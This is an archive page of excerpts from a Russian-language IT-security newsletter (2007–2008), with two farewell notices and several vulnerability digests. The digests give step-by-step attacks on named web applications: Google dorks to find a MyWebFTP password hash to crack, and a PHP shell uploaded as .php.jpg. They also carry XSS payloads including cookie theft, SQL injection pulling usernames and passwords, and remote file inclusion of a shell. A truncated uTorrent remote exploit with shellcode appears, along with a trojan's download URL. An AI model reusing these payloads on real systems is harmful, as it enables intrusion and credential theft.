Отправляет email-рассылки с помощью сервиса Sendsay

Новый web-проект.

Здравствуйте, уважаемые подписчики. Как вы заметили рассылка уже более не выходит и сейчас стоит вопрос о её закрытии, но я хочу вас обрадовать - вы не потеряете источник знаний об уязвимостях и компьютерных премудростей. Всех вас я приглашаю к нам на сайт http://nodeface.ru Я надеюсь увидеть вас на нашем новом проекте, который обещает быть довольно интересным. ...

2008-04-21 12:44:04 + Комментировать

Здравствуйте, дорогие подписчики!

Это последний выпуск рассылки «IT-безопасность в быту и не только». Проект больше на Субскрайбе существовать не будет. Уже нет той былой искры, нет былого задора. Пытался реанимировать себя путем смены структуры рассылки не получилось. Хотя из области IT-безопасности я уходить не буду. Много я пережил, и письма от людей, которым не нравилась моя работа, и письма от администрации Subscribe.Ru, и слова благодарности. Но прогресс не стоит на месте и всем надо развиваться. Вот и я решил развиться до уровня форума (http://forum.system32.name). К сожалению базу уязвимостей по рассылке восстановить не удалось, но кое-какие знания остались. Тем более, что форум регулярно обновляется усилиями одной команды, в которой я состою, и я хотел бы видеть в этой команде и вас. Я надеюсь, что мы с вами, встретившись на страницах форума, сможем многое обсудить и вспомнить. Надеюсь до скорых встреч, ваш автор — Lesnoy_chelovek. Форум system_32. Безопасность - http://forum.system32.name ...

2007-12-24 21:52:42 + Комментировать

IT-безопасность в быту и не только

No 1 IT-безопасность в быту и не только Тираж: 1801 MyWebFTP MyWebFTP Риск: высокий В приложении MyWebFTP есть одна большая уязвимость, с помощью которой мы можем узнать пароль зашифрованный в md5. итак, по порядку: с помощью запроса inurl:/mwftp/ в Google находим сайты с данным продуктом. Переходим по ссылке и меняем адрес на http://site.com/path/mwftp/pass/pass.txt и видим md5. С помощью PasswordPro или md5nside расшифровываем его. По адресу http://site.com/path/ftp.php находиться адимнка. Авторизовываем...

2007-11-08 11:02:07 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в ifdate, w2box, Jetbox CMS,

Компьютер для продвинутых пользователей ifdate 2 Пример: Отключаем в браузере javascript и заходим по адресу: http://victim.com/[path]/admin/ w2box 2.0 Пример: Переименновываем шелл из .php в .php.jpg и закачиваем. Jetbox CMS 2.1 Пример: http://127.0.0.1/jetbox/index.php/view/search/?path[xss] http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname[xss] http://127.0.0.1/jetbox/index.php/view/supplynews/?companyname=1...

2007-05-23 20:25:13 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в Mini Web Shop, Kayako

Компьютер для продвинутых пользователей Mini Web Shop 2 Пример: http://remote-server/path/modules/sendmail.php/><ScRiPt>alert(100438267)</ScRiPt> http://remote-server/path/modules/order_form.php/><ScRiPt>alert(1979336232)</ScRiPt> Kayako eSupport 3.00.90 Пример: [Path]/index.php_m><script>alert(1);</script> pfa CMS 6.0 Пример: http://[site]/[pfa_path]/index.php?repinc=http://shell.txt? fipsCMS 2.1 Пример: /home/index.asp?pid'/*/union/*/select/*/0,username,password,3,4,5,6,7,8,9/*/from/*/p...

2007-05-10 09:05:21 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по вирусам.

Компьютер для продвинутых пользователей В этом выпуске: Trojan-Downloader.Win32. Nurech.bh Троянская программа, предназначенная для загрузки из сети Интернет файлов без ведома пользователя. Является приложением Windows (PE-EXE файл. Имеет размер 2560 байт. Деструктивная активность Троянец запускает процесс < IEXPLORE.EXE > и внедряет в него свой вредоносный код, в результате чего происходит скачивание файла по ссылке: http://souljah.com/*/ie.exe Файл сохраняется в корневом каталоге Windows: %WinDir\ie.exe ...

2007-05-04 14:05:24 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в PostNuke Journal.

Компьютер для продвинутых пользователей В этом выпуске: PostNuke Journal PostNuke Journal Пример: http://www.example.com/index.php?module=v4bJournal...

2007-05-04 09:05:38 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в wordTube, wp-Table.

Компьютер для продвинутых пользователей В этом выпуске: wordTube | wp-Table ПО: wordTube Версия: О продукте: Этот плагин создают персональный YouTube плеер, поддерживающий потоковые видеоформаты и Mp3, JPG, GIF и PNG. Уязвимость: -wordtube-button.php- . */ // get and set path of function if _POST) $wppath_GET'wpPATH]; else $wppath_POST'wpPATH]; require_once$wppath'/wp-config.php); require_once$wppath'/wp-admin/admin.php); . - Параметр " wpPATH " не проверяется, что даёт возможость задавать различные значен...

2007-05-03 09:05:17 1 комментарий

Компьютер для продвинутых пользоватлей Выпус по безопасности. Уязвимости в XLAtunes, MyCalendar,

Компьютер для продвинутых пользователей В этом выпуске: XLAtunes | MyCalendar | Microsoft Windows | Navigator Directory Traversal Vulnerability | Plantilla PHP Simple | LoveCMS | WebSpell | FlashGameScript ПО: XLAtunes Версия: 0.1 Использование: http://host.com/path/?mode=view&album-1%20UNION%20SELECT%20confkey%20FROM%20config/* #confkey>Password #confvalue>Username ПО: MyCalendar Использование: http://www.target.ma/calendar/index.php?go><script>alert(document.cookie)</script> ПО: Microsoft Windo...

2007-02-25 09:05:47 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Exploits.

Компьютер для продвинутых пользователей В этом выпуске: uTorrent 1.6 | SunOS 5.10 | Portable OpenSSH | ПО: uTorrent 1.6 Exploit: /* * This is a PoC remote exploit for uTorrent 1.6 * * Author: * defsec <defacedsecurity@hotmail.com> * http://www.defacedsecurity.com * * * Works on XP SP1 and w2k sp1-4 * */ #include <stdio.h> #include <stdlib.h> #define NASIZE 4880 unsigned char nice_announce[NASIZE]; unsigned char xorops\x33\xc0\x33\xdb"; // win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=Pex...

2007-02-18 23:15:49 + Комментировать

Рекомендуем подписаться: